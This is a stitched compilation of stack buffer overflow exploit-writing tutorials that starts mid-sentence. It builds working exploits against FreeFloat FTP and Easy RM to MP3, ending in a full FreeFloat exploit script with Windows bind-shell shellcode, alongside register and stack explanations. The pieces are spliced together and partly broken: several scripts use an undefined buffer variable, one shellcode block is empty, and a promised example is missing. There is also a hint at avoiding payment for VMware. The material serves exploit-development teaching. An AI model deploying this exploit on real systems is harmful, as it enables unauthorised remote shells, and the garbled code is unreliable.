with B0 or the list would have been truncated.
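Comparing the dump by eye is tedious, so the check can be scripted. The Python 3 sketch below assumes you have copied the bytes that follow ESP out of the debugger into a bytes object; the helper names all_chars and first_mismatch are made up for this illustration.

```python
def all_chars(exclude=b"\x00\x0a"):
    """Every byte value 0x00-0xff except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent, dumped):
    """Return (index, sent_byte, dumped_byte) for the first difference, or None.

    A dump that is shorter than what was sent (truncation) is reported with
    dumped_byte set to None.
    """
    for index, expected in enumerate(sent):
        if index >= len(dumped):
            return index, expected, None
        if dumped[index] != expected:
            return index, expected, dumped[index]
    return None


sent = all_chars()
print(first_mismatch(sent, sent))                      # identical dump
print(first_mismatch(b"\x01\x02\x03", b"\x01\xb0\x03"))  # a byte was replaced
```

When a mismatch is reported, the usual routine is to add that byte to the exclude list, resend, and repeat until the comparison returns None.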
Example of a program with lots of bad characters. Not a part of this exploit.
Now that we have control over the EIP register, we need to make it point to the address held in
the ESP register so that the CPU starts executing the contents of the stack. The JMP ESP
instruction does exactly that: when it is executed, execution jumps to the address stored in
ESP. We can find the location of a JMP ESP instruction in the following ways:
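One way to picture the search, sketched in Python 3: JMP ESP assembles to the two bytes FF E4, so finding it comes down to scanning a module's bytes for that sequence. The image bytes and the base address below are hypothetical stand-ins for a module as it is mapped in memory; debugger plugins perform the same kind of scan on the real process and additionally filter on module protections and bad characters.

```python
JMP_ESP = b"\xff\xe4"  # machine code for the x86 instruction JMP ESP


def find_jmp_esp(image, base_address):
    """Return the virtual address of every JMP ESP byte sequence in image."""
    addresses = []
    position = image.find(JMP_ESP)
    while position != -1:
        addresses.append(base_address + position)
        position = image.find(JMP_ESP, position + 1)
    return addresses


# Hypothetical module contents and load address, for illustration only.
fake_image = b"\x90\xff\xe4\x90\x90\xff\xe4"
for address in find_jmp_esp(fake_image, 0x10000000):
    print(hex(address))
```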
Game Over
We generate shellcode using msfvenom and use the generated shellcode in our final exploit.
1. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
2. https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md
3. https://www.fuzzysecurity.com/tutorials/expDev/1.html
4. https://www.youtube.com/watch?v=qSnPayW6F7U
5. https://www.geeksforgeeks.org/memory-layout-of-c-program/
6. https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
7. https://www.acunetix.com/blog/web-security-zone/what-is-buffer-overflow/
https://sghosh2402.medium.com/understanding-exploiting-stack-based-buffer-overflows-acf9b8659cba
This is the first part in a (modest) multi-part exploit development series. This part will just
cover some basic things like what we need to do our work, basic ideas behind exploits and a
couple of things to keep in mind if we want to get to and execute our shellcode. These tutorials
will not cover finding bugs, instead each part will include a vulnerable program which needs a
specific technique to be successfully exploited. In the fullness of time I intend to cover
everything from “Saved Return Pointer Overflows” to “ROP (Return Oriented Programming)”;
of course these tutorials won't write themselves, so it will take some time to get there. It is
worth mentioning that these tutorials won't cover all the small details and eventualities; this is
done by design to (1) save me some time and (2) allow the diligent reader to learn by
participating.
I would like to give special thanks to Offensive Security and Corelan, thanks for giving me
this amazing and painful addiction!!
Mona.py - Download
Mona is an amazing tool with tons of features which will help us to do rapid and reliable
exploit development. I won’t be discussing all the options here, we’ll get to them during the
following parts of the tutorial. Download it and put it in Immunity’s PyCommands folder.
Pvefindaddr.py - Download
Pvefindaddr is Mona’s predecessor. I know it’s a bit outdated but it’s still useful since there are
some features that haven’t been ported to Mona yet. Download it and put it in Immunity’s
PyCommands folder.
Virtualization Software
Basically there are two options here: VirtualBox, which is free, and VMware, which isn't. If it's
possible I would suggest using VMware; a clever person might not need to pay for it ;)).
Coupled with this we will need several (32-bit) operating systems to develop our exploits on
(you will get the most use out of Windows XP PRO SP3 and any Windows 7).
(2) Overflows
For the purpose of these tutorials I think it’s important to keep things as simple or difficult as
they need to be. In general when we write an exploit we need to find an overflow in a
program. Commonly these bugs will be either Buffer Overflows (a memory location receives
more data than it was meant to) or Stack Overflows (usually a Buffer Overflow that writes
beyond the end of the stack). When such an overflow occurs there are two things we are
looking for: (1) our buffer needs to overwrite EIP (Current Instruction Pointer) and (2) one of
the CPU registers needs to contain our buffer. You can see a list of x86 CPU registers below
with their separate functions. All we need to remember is that any of these registers can store
our buffer (and shellcode).
EAX - Main register used in arithmetic calculations. Also known as accumulator, as it holds
results of arithmetic operations and function return values.
EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of
the program.
ECX - The Counter register is often used to hold a value representing the number of times a
process is to be repeated.
EDX - A general-purpose register. Also used for I/O operations. Helps extend EAX to 64 bits.
ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used
as an offset address in string and array operations. It holds the address from where to read
data.
EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by
the ES register. Used as an offset address in string and array operations. It holds the implied
write address of string operations.
EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of
the current stack frame.
ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame.
EIP - Instruction Pointer (holds the address of the next instruction to be executed)
https://www.fuzzysecurity.com/tutorials/expDev/1.html
For our first exploit we will be starting with the most straight forward scenario where we have
a clean EIP overwrite and one of our CPU registers points directly to a large portion of our
buffer. For this part we will be creating an exploit from scratch for ”FreeFloat FTP”. You can
find a list of several exploits that were created for ”FreeFloat FTP” here.
Normally we would need to do bad character analysis, but for our first tutorial we will rely on
the bad characters that are listed in the pre-existing Metasploit modules on exploit-db. The
characters that are listed are ”\x00\x0A\x0D”. We need to keep these characters in mind for
later.
First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that
we can build on it to create our exploit. You can see my POC below, I have based it on the
exploits for ”FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing
”anonymous” user account which comes configured with the FTP server (the exploit should
work with any valid login credentials).
#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer
the program crashes. In the screenshot below you can see that EIP is overwritten and that two
registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP
seems more promising since it contains a larger chunk of our buffer (I should mention however
that creating an exploit starting in EDI is certainly possible).
Registers
Overwriting EIP
Next we need to analyze our crash. To do that we need to replace our A's with the Metasploit
pattern and resend our buffer. Make sure you keep the original buffer length, since a
varying buffer length may change the program crash.
root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2
Au3Au4Au5Au6Au7Au8Au9Av0Av1
Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4A
x5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A
y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb
2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc
2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be
7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7
Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
When the program crashes again we see the same thing as in the screenshot above except
that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let
“mona” do some of the heavy lifting. If we issue the following command in Immunity debugger
we can have “mona” analyze the program crash. You can see the result of that analysis in the
screenshot below.
!mona findmsp
Metasploit Pattern
From the analysis we can see that EIP is overwritten by the 4 bytes which directly follow
the initial 247 bytes of our buffer. As I said before, we can also see that ESP contains a larger
chunk of our buffer, so it is a more suitable candidate for our exploit. Using this information we
can reorganize the evil buffer in our POC above to look like this:
When we resend our modified buffer we can see that it works exactly as we expected, EIP is
overwritten by our four B's.
EIP = 42424242
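The reorganized buffer described above can be sketched in Python 3 as follows. The offset of 247 and the total length of 1000 come from the text; the helper name build_buffer and the choice of "C" as trailing filler are assumptions made for this example.

```python
OFFSET = 247         # bytes that precede the saved return address (from findmsp)
TOTAL_LENGTH = 1000  # keep the original buffer length so the crash stays the same


def build_buffer(eip_bytes, offset=OFFSET, total=TOTAL_LENGTH):
    """Return padding + 4 bytes that land in EIP + filler up to the total length."""
    if len(eip_bytes) != 4:
        raise ValueError("EIP is a 32-bit register: exactly 4 bytes are required")
    filler = b"C" * (total - offset - len(eip_bytes))
    return b"A" * offset + eip_bytes + filler


evil = build_buffer(b"BBBB")
print(len(evil), evil[OFFSET:OFFSET + 4])
```

Seeing 42424242 in EIP confirms the offset, because 0x42 is the ASCII code for "B" and only the four bytes at positions 247 to 250 carry that value.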
That means that we can replace those B's with a pointer that redirects execution flow to ESP.
The only thing we need to keep in mind is that our pointer can't contain any bad characters. To
find this pointer we can use “mona” with the following command. You can see the results in
the screenshot below.
Pointers to ESP
It seems that any of these pointers will do. They belong to OS DLLs, so they will be specific to
“WinXP PRO SP3”, but that’s not our primary concern. We can just use the first pointer in the
list. Keep in mind that we will need to reverse the byte order due to the Little Endian
architecture of the CPU. Observe the syntax below.
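Reversing the bytes by hand is easy to get wrong, so here is a small Python 3 sketch that lets struct.pack do it and also checks the result against the bad characters listed earlier. The address 0x1234ABCD is a made-up placeholder, not a pointer taken from the mona output.

```python
import struct

BADCHARS = b"\x00\x0a\x0d"  # the bad characters listed for this target


def pack_pointer(address):
    """Encode a 32-bit address in little-endian byte order."""
    return struct.pack("<I", address)


def contains_badchars(data, badchars=BADCHARS):
    """Return True if any byte of data is a bad character."""
    return any(byte in badchars for byte in data)


POINTER = 0x1234ABCD  # hypothetical address, for illustration only
packed = pack_pointer(POINTER)
print(packed, contains_badchars(packed))
```

The least significant byte comes first, so 0x1234ABCD is sent as \xcd\xab\x34\x12. A candidate such as 0x7C000A12 would be rejected because it contains both \x00 and \x0a.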
I should stress that it is important to document your exploit properly for your own and others'
edification. Our final stage POC should look like this.
#!/usr/bin/python
import socket
import sys
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
#------------------------------------------------------------
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
Ok, let's restart the program in the debugger and put a breakpoint on our pointer so the
debugger pauses if it reaches it. As we can see in the screenshot below, EIP is overwritten by
our pointer and we hit our breakpoint, which should bring us to our buffer located at ESP.
Breakpoint
#!/usr/bin/python
import socket
import sys
shellcode = (
)
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
#------------------------------------------------------------
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
All that remains now is to pop in some shellcode. We will be using msfpayload to generate our
shellcode and pipe the raw output to msfencode to filter out bad characters.
root@bt:~# msfpayload -l
[...snip...]
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a
command shell
[...snip...]
Module: payload/windows/shell_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Description:
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";
After prettifying the code a bit and adding the relevant notes the final exploit is ready.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 2 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/2.html #
#----------------------------------------------------------------------------------#
# #
import socket
import sys
#----------------------------------------------------------------------------------#
#----------------------------------------------------------------------------------#
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
In the screenshot below we can see the before and after output of the “netstat -an” command
and below that we have the backtrack terminal output when we connect to our bind shell.
Game Over!!
Shell
ipconfig
Windows IP Configuration
IP Address. . . . . . . . . . . . : 192.168.111.128
https://www.fuzzysecurity.com/tutorials/expDev/2.html
Last Friday (July 17th, 2009), somebody nicknamed ‘Crazy_Hacker’ reported a vulnerability
in Easy RM to MP3 Conversion Utility (on XP SP2 En), via packetstormsecurity.org
(see http://packetstormsecurity.org/0907-exploits/). The vulnerability report included a proof
of concept exploit (which, by the way, failed to work on my MS Virtual PC based XP SP3
En). Another exploit was released just a little bit later.
Nice work. You can copy the PoC exploit code, run it, see that it doesn’t work (or if you are
lucky, conclude that it works), or… you can try to understand the process of building the
exploit so you can correct broken exploits, or just build your own exploits from scratch.
(By the way : unless you can disassemble, read and comprehend shellcode real fast, I would
never advise you to just take an exploit (especially if it’s a precompiled executable) and run
it. What if it’s just built to open a backdoor on your own computer ?)
The question is : How do exploit writers build their exploits ? What does the process of going
from detecting a possible issue to building an actual working exploit look like ? How can you
use vulnerability information to build your own exploit ?
Ever since I’ve started this blog, writing a basic tutorial about writing buffer overflows has
been on my “to do” list… but I never really took the time to do so (or simply forgot about it).
When I saw the vulnerability report today, and had a look at the exploit, I figured this
vulnerability report could act as a perfect example to explain the basics about writing
exploits… It’s clean, simple and allows me to demonstrate some of the techniques that are
used to write working and stable stack based buffer overflows.
So perhaps this is a good time… Despite the fact that the aforementioned vulnerability report
already includes an exploit (working or not), I’ll still use the vulnerability in “Easy RM to MP3
conversion utility” as an example and we’ll go through the steps of building a working exploit,
without copying anything from the original exploit. We’ll just build it from scratch (and make it
work on XP SP3 this time :) )
Before we continue, let me get one thing straight. This document is purely intended for
educational purposes. I do not want anyone to use this information (or any information on this
blog) to actually hack into computers or do other illegal things. So I cannot be held responsible
for the acts of other people who took parts of this document and used it for illegal purposes. If
you don’t agree, then you are not allowed to continue to access this website… so leave this
website immediately.
Anyway, that being said, the kind of information that you get from vulnerability reports
usually contains information on the basics of the vulnerability. In this case, the vulnerability
report states “Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit
that creates a malicious .m3u file”. In other words, you can create a malicious .m3u file, feed it
into the utility and trigger the exploit. These reports may not be very specific every time, but in
most cases you can get an idea of how you can simulate a crash or make the application
behave weird. If not, then the security researcher probably wanted to disclose his/her findings
first to the vendor, give them the opportunity to fix things… or just wants to keep the intel for
him/herself…
First of all, let’s verify that the application does indeed crash when opening a malformed
m3u file (or find yourself an application that crashes when you feed specially crafted data to
it).
Get yourself a copy of the vulnerable version of Easy RM to MP3 and install it on a computer
running Windows XP. The vulnerability report states that the exploit works on XP SP2 (English),
but I’ll use XP SP3 (English).
Quick sidenote : you can find older versions of applications at oldapps.com and oldversion.com,
or by looking at exploits on exploit-db.com (which often have a local copy of the vulnerable
application as well)
We’ll use the following simple perl script to create a .m3u file that may help us to discover
more information about the vulnerability :
my $file= "crash.m3u";
my $junk= "\x41" x 10000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
Run the perl script to create the m3u file. The file will be filled with 10000 A’s (\x41 is the
hexadecimal representation of A). Open this m3u file with Easy RM to MP3… The
application throws an error, but it looks like the error is handled correctly and the application
does not crash. Modify the script to write a file with 20000 A’s and try again. Same
behaviour (the exception is handled correctly, so we still could not overwrite anything useful).
Now change the script to write 30000 A’s, create the m3u file and open it in the utility. This
time, the application crashes.
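If you prefer to generate all three test files in one go, the same experiment can be sketched in Python 3. The file names crash_10000.m3u and so on, and the helper names, are arbitrary choices for this example.

```python
import os


def write_m3u(path, count):
    """Write `count` bytes of 0x41 ('A') to path and return the resulting file size."""
    with open(path, "wb") as handle:
        handle.write(b"\x41" * count)
    return os.path.getsize(path)


def make_test_files(directory, sizes=(10000, 20000, 30000)):
    """Create one .m3u file per size and return a {path: size} mapping."""
    created = {}
    for size in sizes:
        path = os.path.join(directory, "crash_%d.m3u" % size)
        created[path] = write_m3u(path, size)
    return created
```

Calling make_test_files(".") drops the three files into the current directory, ready to be opened in the utility one after the other.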
Obviously, not every application crash can lead to an exploitation. In many cases, an
application crash will not lead to exploitation… But sometimes it does. With “exploitation”, I
mean that you want the application to do something it was not intended to do… such as
running your own code. The easiest way to make an application do something different is by
controlling its application flow (and redirecting it somewhere else). This can be done by
controlling the Instruction Pointer (or Program Counter), which is a CPU register that contains
a pointer to where the next instruction that needs to be executed is located.
Suppose an application calls a function with a parameter. Before going to the function, it saves
the current location in the instruction pointer (so it knows where to return when the function
completes). If you can modify the value in this pointer, and point it to a location in memory
that contains your own piece of code, then you can change the application flow and make it
execute something different (other than returning back to the original place). The code that
you want to be executed after controlling the flow is often referred to as “shellcode”. So if we
make the application run our shellcode, we can call it a working exploit. In most cases, this
pointer is referenced by the term EIP. This register size is 4 bytes. So if you can modify those 4
bytes, you own the application (and the computer the application runs on)
Every Windows application uses parts of memory. The process memory contains 3 major
components :
• code segment (instructions that the processor executes. The EIP keeps track of the
next instruction)
• data segment (variables, dynamic buffers)
• stack segment (used to pass data/arguments to functions, and is used as space for
variables). The stack starts (= the bottom of the stack) from the very end of the virtual
memory of a page and grows down (to a lower address). A PUSH adds something to
the top of the stack; a POP removes one item (4 bytes) from the stack and puts it in a
register.
If you want to access the stack memory directly, you can use ESP (Stack Pointer), which points
at the top (so the lowest memory address) of the stack.
• After a push, ESP will point to a lower memory address (address is decremented with
the size of the data that is pushed onto the stack, which is 4 bytes in case of
addresses/pointers). Decrements usually happen before the item is placed on the
stack (depending on the implementation… if ESP already points at the next free
location in the stack, the decrement happens after placing data on the stack)
• After a POP, ESP points to a higher address (address is incremented (by 4 bytes in case
of addresses/pointers)). Increments happen after an item is removed from the stack.
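The PUSH and POP behaviour described above can be modelled in a few lines of Python 3. The starting address 0x00130000 and the 64-byte size are arbitrary values picked for this sketch, and the class implements the decrement-before-store variant of PUSH.

```python
import struct


class Stack:
    """A tiny model of a 32-bit x86 stack that grows toward lower addresses."""

    def __init__(self, base=0x00130000, size=64):
        self.base = base              # address just above the stack (hypothetical)
        self.low = base - size        # lowest address that belongs to the stack
        self.memory = bytearray(size)
        self.esp = base               # empty stack: ESP sits at the highest address

    def push(self, value):
        """Decrement ESP by 4, then store the value at the new top of the stack."""
        if self.esp - 4 < self.low:
            raise OverflowError("stack exhausted")
        self.esp -= 4
        start = self.esp - self.low
        self.memory[start:start + 4] = struct.pack("<I", value & 0xFFFFFFFF)

    def pop(self):
        """Read the value at the top of the stack, then increment ESP by 4."""
        if self.esp + 4 > self.base:
            raise IndexError("stack empty")
        start = self.esp - self.low
        value = struct.unpack("<I", self.memory[start:start + 4])[0]
        self.esp += 4
        return value


stack = Stack()
stack.push(0x41414141)
stack.push(0xDEADBEEF)
print(hex(stack.esp), hex(stack.pop()), hex(stack.esp))
```

Each push moves ESP four bytes lower and each pop moves it four bytes higher, and the value pushed last is the one popped first.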
When a function/subroutine is entered, a stack frame is created. This frame keeps the
parameters of the parent procedure together and is used to pass arguments to the
subroutine. The current location of the stack can be accessed via the stack pointer (ESP), the
current base of the function is contained in the base pointer (EBP) (or frame pointer).
• EAX : accumulator : used for performing calculations, and used to store return values
from function calls. Basic operations such as add, subtract, compare use this general-
purpose register
• EBX : base (does not have anything to do with base pointer). It has no dedicated purpose
and can be used to store data.
• EDX : data : this is an extension of the EAX register. It allows for more complex
calculations (multiply, divide) by allowing extra data to be stored to facilitate those
calculations.
• EDI : destination index : points to location of where result of data operation is stored
Process Memory
When a process is created, a PEB (Process Environment Block) and TEB (Thread Environment
Block) are created.
The PEB contains all user land parameters that are associated with the current process :
• pointer to loader data (can be used to list all dll’s / modules that are/can be loaded
into the process)
The TEB describes the state of a thread, including :
• pointer to the first entry in the SEH chain (see tutorial 3 and 3b to learn more about
what a SEH chain is)
The text segment of a program image / dll is read-only, as it only contains the application code.
This prevents the application code from being modified. This memory segment has a fixed
size. The data segment is used to store global and static program variables: initialized global
variables, strings, and other constants.
The data segment is writable and has a fixed size. The heap segment is used for the rest of the
program variables. It can grow larger or smaller as desired. All of the memory in the heap is
managed by allocator (and deallocator) algorithms, which reserve a memory region for it.
The heap grows towards higher addresses.
In a dll, the code, imports (list of functions used by the dll, from another dll or application), and
exports (functions it makes available to other dll’s / applications) are part of the .text segment.
The Stack
The stack is a piece of the process memory, a data structure that works LIFO (Last in first out).
A stack gets allocated by the OS, for each thread (when the thread is created). When the
thread ends, the stack is cleared as well. The size of the stack is defined when it gets created
and doesn’t change. Combined with LIFO and the fact that it does not require complex
management structures/mechanisms to get managed, the stack is pretty fast, but limited in
size.
LIFO means that the most recently placed data (the result of a PUSH instruction) is the first
to be removed from the stack again (by a POP instruction).
When a stack is created, the stack pointer points to the top of the stack ( = the highest address
on the stack). As information is pushed onto the stack, this stack pointer decrements (goes to a
lower address). So in essence, the stack grows to a lower address.
The stack contains local variables, function calls and other info that does not need to be stored
for a larger amount of time. As more data is added to the stack (pushed onto the stack), the
stack pointer is decremented and points at a lower address value.
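The push/pop behaviour described above can be sketched with a toy model. This is a minimal illustration in Python (not the Perl used for the scripts in these notes); the class name, the base address 0x0022FF80 and the region size are made up for the example and are not taken from a real process.

```python
import struct

class Stack:
    """Toy model of a downward-growing x86 stack (addresses are illustrative)."""

    def __init__(self, base=0x0022FF80, size=0x100):
        self.base = base                  # highest address of the region
        self.limit = base - size          # lowest usable address
        self.mem = bytearray(size)
        self.esp = base                   # empty stack: ESP sits at the highest address

    def push(self, value):
        self.esp -= 4                     # ESP is decremented first...
        off = self.esp - self.limit
        self.mem[off:off + 4] = struct.pack("<I", value)   # ...then the dword is stored

    def pop(self):
        off = self.esp - self.limit
        (value,) = struct.unpack("<I", self.mem[off:off + 4])
        self.esp += 4                     # ESP is incremented after the read
        return value

stack = Stack()
stack.push(0x11111111)
stack.push(0x22222222)
esp_after_pushes = stack.esp              # two pushes: 8 bytes lower than the base
first_out = stack.pop()                   # LIFO: the last value pushed comes out first
second_out = stack.pop()
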